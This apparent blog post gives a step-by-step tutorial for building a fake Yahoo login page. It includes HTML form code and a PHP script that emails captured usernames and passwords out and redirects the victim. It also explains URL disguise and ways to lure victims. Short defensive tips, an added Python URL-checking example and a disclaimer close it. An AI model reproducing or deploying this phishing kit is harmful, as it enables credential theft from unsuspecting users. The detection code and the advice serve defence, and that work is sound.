It’s quite easy to construct a bogus login page and steal a password. Let’s look at the methods used to construct a fake login screen and how hackers steal your password.

Step 1: Create the fake login page

a) Take the print screen of the correct login page


b) Slice the web page using some tools like Photoshop

Slicing the original login screen to make the fake login screen
c) Save the file as HTML
d) Clean it up
e) Replace the main text box with our text box. Name it exactly as in the original. It will help to show the dropdown while they enter the address
f) Replace the form submit button
g) The code will look like this (don’t forget to add the design elements in between. Add CSS etc as needed)

<form method="post" action="submit.php">
<input name="username" type="text" size="15" maxlength="25" />
<input name="password" type="password" size="15" maxlength="25" />
<input name="Sign In" type="button" /></form>


Step 2: Add server side scripts to email the information and redirect to the correct login page

a) In submit.php write code like this

 
//extracting post

extract($_POST);

//making the email message

$message = "user name : ". $username."Password : ".$password;

// sending the email

mail('[email protected]', 'Hey here is the password', $message);

//you are done ...redirecting the user

header('Location: http://www.yahoo.com/');

?>

Step 3: Host them at a website
Host the website somewhere with some server side support like PHP, ASP, JSP etc.

Step 4: Make the URL complicated enough that the user won’t notice whether it’s real or not
Name the login screen something like yahoo.com_mail_login.php?action=login&email=yes so that even if they look at the URL, they don’t get suspicious

Step 5: Wait for the victim
Set this website as the home page on the victim’s computer, send him the link through email, etc., and simply wait. If the user is not that tech savvy, he is sure to fall prey to the fake login screen.

See how simple it is to construct and set up a fake login screen and steal a password. Beware of such scams and be cautious while entering your password. Always look for the correct domain name before entering the password. Internet Explorer 8 onwards highlights the actual domain in a different color from the other strings in the URL.
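The domain check recommended above can be automated, for example in a mail filter or proxy. The following is an added example, not code from the original article: it classifies a URL by the host it actually resolves to and flags the Step 4 trick of putting the brand name elsewhere in the URL. The trusted-domain set, the function name and the sample URLs are assumptions made for the example.

```python
from urllib.parse import urlsplit

# Assumption: the only domain where this password should ever be typed.
TRUSTED_LOGIN_DOMAINS = {"yahoo.com"}


def classify_login_url(url, trusted=TRUSTED_LOGIN_DOMAINS):
    """Return 'trusted', 'lookalike' or 'unknown' for a login page URL."""
    if not url.lower().startswith(("http://", "https://")):
        url = "http://" + url  # bare "host/path" as pasted from an email
    host = (urlsplit(url).hostname or "").rstrip(".").lower()

    # Only the host decides which server renders the form and receives it.
    if any(host == d or host.endswith("." + d) for d in trusted):
        return "trusted"

    # The trusted name showing up anywhere else (file name, query string,
    # userinfo before '@', or as a prefix of a foreign host) is a disguise.
    if any(d in url.lower() for d in trusted):
        return "lookalike"
    return "unknown"


# Constructed sample URLs; example.test and example.org are placeholder hosts.
SAMPLES = [
    "https://login.yahoo.com/",
    "http://example.test/yahoo.com_mail_login.php?action=login&email=yes",
    "http://yahoo.com.example.test/login",
    "http://mail.yahoo.com@example.test/",
    "https://example.org/",
]


def report(samples=SAMPLES):
    """Pair each sample URL with its verdict."""
    return [(classify_login_url(u), u) for u in samples]


if __name__ == "__main__":
    for verdict, url in report():
        print(f"{verdict:9} {url}")
```

This check works on the URL text only, so it does not catch the hosts-file case described below, where the real name resolves to the wrong server.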

If you are on a shared computer, beware: the attacker can write to the Windows hosts file and even make the URL appear as mail.yahoo.com. (How? In another post.)

Sample page : http://www.phishingsucks.110mb.com/ (Don’t enter your real password)

Result page : http://phishingsucks.110mb.com/passwd.htm

We don’t endorse hacking or spying; this article was written to show how easy it is to set up a fake login screen and how careful we have to be while entering passwords.
